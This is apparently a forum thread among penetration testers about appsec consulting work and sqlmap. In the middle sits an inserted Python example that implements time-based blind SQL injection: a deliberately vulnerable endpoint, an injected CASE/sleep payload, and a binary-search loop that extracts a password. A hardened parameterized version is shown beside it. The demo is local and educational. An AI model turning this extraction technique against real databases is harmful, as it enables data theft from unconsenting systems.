I worked as an IT security consultant for a bit over a year and found it rather boring after a while. In theory, you do lots of interesting and different things, get to know many different technologies. Maybe it was just the job I was working at, but the actual penetration testing became pretty boring after a few months.
While it sounds compelling to beat up startups, startups are probably not the clients. Our consulting day rates were very expensive and usually only large corporations or the government could afford it.
You just go and check for the top OWASP vulnerabilities. Sometimes, it requires some creativity, but oftentimes, you get a "feeling" for a web app after a while. Many PHP projects, many open source software projects that got a few custom made plugins. And then it's a bit dull. Testing every single parameter of a web app with many attack vectors...
I have to admit that there was one guy at our company who did a lot of reverse engineering, iOS security, testing a DRM system for an ebook online library (key takeaway: you can't control the client. DRM makes it harder, but it is never impossible to crack the system as long as the hardware is not custom made or something), stuff like that. So this was quite challenging and changing, but this was rare.
One gem I want to add to the original post: If you're interested in SQL injection, check out sqlmap. That tool is a real breaker and worked wonders for us and we downloaded entire databases by having a tiny little SQL injection vulnerability in the signup form of a newsletter or something like that.
We work with lots of startups. We work with big companies, too, but that work is disproportionately with big west coast tech companies. The "east coast" BigCo work we do touches on trading protocols and order routing systems, which is fun for a lot of other reasons (wider application domain for findings, extremely high impact, complicated systems with message-oriented middleware, non-web inputs).
We do zero government work.
I don't feel like we're alone in appsec shops for having this mix. I think one possible difference is between pure appsec shops like us, iSec Partners, IOActive, and Stach & Liu, versus general security practices. The work at general security practices might be more of a drag.
It's also the case that network security, being a race to the bottom (with Nessus and Metasploit "scanner jockeys" and the like) is actively trying to push up into appsec. Maybe the web appsec work at a place like that is boring? We take it pretty seriously.
We avoid tools like sqlmap.
I'm answering this on the off chance that the conversation is a good glimpse into the working life of an appsec pentester (since that's what Cody's writing about).
> Maybe the web appsec work at a place like that is boring? We take it pretty seriously.
Could be. Your work description sounds different though. We did use Nessus and Metasploit for some things, but not for web app security, since ALL these tools suck on a web app security level. They do stupid request-response analysis and they usually have no capability to hold some sort of state, which gets increasingly important in modern web apps.
> We avoid tools like sqlmap.
I think there's actually no other tool like sqlmap. Sqlmap is pure gold as a time saver and also capability-wise. Exploiting a blind time-based SQL vulnerability manually is a pain. Why not use a good tool for that?
If you want to be super careful, just hook up Burp between sqlmap and the target host and check every statement manually. Still better than typing it out.
Note for non-security guys: Blind means that you don't get an error message from the host, which should be the default. Time-based means that you craft some SQL statements that take longer than other statements to get an idea which statement is true. So you could ask something like "does user 1 in table 1 start with letter a-f? if so, return it, if not, wait 3 seconds". This way, you get true or false based on the time it takes the host to respond.
Still, if you're interested in web app security, go and try it out. But if you feel you're some sort of pentesting monkey that does the same stuff day-in day-out, better leave and chase something more interesting :)
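The time-based blind technique described in the comment above, worked through end to end as an added example (not code from any commenter and not sqlmap's own code). It simulates a newsletter-signup endpoint that returns neither rows nor errors, wraps it in a timing oracle, and runs the binary-search extraction loop that sqlmap automates; the same endpoint with a bound parameter is shown beside it so the difference is visible. Everything here is constructed for the example: the tables, the 'admin' row, the password 's3cr3t', and SQLite standing in for the real database (on MySQL the calls would be SLEEP() and ASCII(), on PostgreSQL pg_sleep() and ascii()).

```python
"""Time-based blind SQL injection, end to end: a simulated newsletter-signup
endpoint that leaks nothing but response time, an attacker-side oracle, and the
binary-search extraction loop that sqlmap automates for you.

Constructed demo: the tables, the 'admin' row and its password 's3cr3t' are
made up for this example. SQLite stands in for the real database; on MySQL the
sleep would be SLEEP() and the code-point lookup ASCII(), on PostgreSQL
pg_sleep() and ascii()."""
import sqlite3
import time
from typing import Callable

DELAY = 0.05  # seconds the injected CASE sleeps when the guessed condition is true


def _make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cr3t')")
    conn.execute("CREATE TABLE newsletter (email TEXT)")
    conn.execute("INSERT INTO newsletter VALUES ('alice@example.com')")  # WHERE must run on >= 1 row
    # SQLite has no SLEEP(); register one so the payload has something to call.
    conn.create_function("sleep", 1, lambda secs: time.sleep(secs) or 1)
    return conn


class VulnerableSignup:
    """Query built by string concatenation: the bug. The caller gets neither
    rows nor error messages back (blind), so timing is the only side channel."""

    def __init__(self) -> None:
        self.conn = _make_db()

    def is_subscribed(self, email: str) -> None:
        self.conn.execute(
            f"SELECT count(*) FROM newsletter WHERE email = '{email}'"
        ).fetchall()


class HardenedSignup(VulnerableSignup):
    """Same endpoint with a bound parameter: the payload is compared as a
    literal string and its CASE/sleep never reaches the SQL parser."""

    def is_subscribed(self, email: str) -> None:
        self.conn.execute(
            "SELECT count(*) FROM newsletter WHERE email = ?", (email,)
        ).fetchall()


def time_oracle(target: Callable[[str], None]) -> Callable[[str], bool]:
    """Wrap the endpoint as a yes/no oracle: inject a CASE that sleeps only when
    `condition` holds and read the answer back from the elapsed time."""

    def ask(condition: str) -> bool:
        payload = f"x' OR (CASE WHEN ({condition}) THEN sleep({DELAY}) ELSE 0 END) --"
        start = time.perf_counter()
        target(payload)
        return time.perf_counter() - start >= DELAY / 2

    return ask


def is_injectable(ask: Callable[[str], bool]) -> bool:
    """The sanity check tools run first: a tautology must be slow and a
    contradiction fast, otherwise the delay is noise, not injection."""
    return ask("1=1") and not ask("1=2")


def _bsearch(ask: Callable[[str], bool], expr: str, lo: int, hi: int) -> int:
    """Smallest v in [lo, hi] with expr <= v; about log2(hi - lo) queries
    instead of one per candidate value."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(f"{expr} <= {mid}"):
            hi = mid
        else:
            lo = mid + 1
    return lo


def extract(ask: Callable[[str], bool], subquery: str, max_len: int = 64) -> str:
    """Pull the scalar result of `subquery` out one character at a time.
    Assumes printable ASCII (32..126); widen the range for other charsets."""
    length = _bsearch(ask, f"length(({subquery}))", 0, max_len)
    chars = []
    for i in range(1, length + 1):
        code = _bsearch(ask, f"unicode(substr(({subquery}), {i}, 1))", 32, 126)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    secret = "SELECT password FROM users WHERE name = 'admin'"
    for app in (VulnerableSignup(), HardenedSignup()):
        ask = time_oracle(app.is_subscribed)
        name = type(app).__name__
        if is_injectable(ask):
            print(f"{name}: injectable, extracted {extract(ask, secret)!r}")
        else:
            print(f"{name}: no timing difference, not injectable")
```

The binary search over the character's code point is what turns "one request per guess" into about seven requests per character; the `is_injectable` tautology/contradiction pair is the same heuristic a tool runs before it trusts any timing result, and the half-delay threshold is the knob you tune on a noisy network (sqlmap raises the delay for you when responses jitter).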
> I think there's actually no other tool like sqlmap.
But there is no tool that will come close to competing with a top-notch pentester on a SQLi hunt. Automated tools just don't cut it. There is nothing like watching First Blood in action.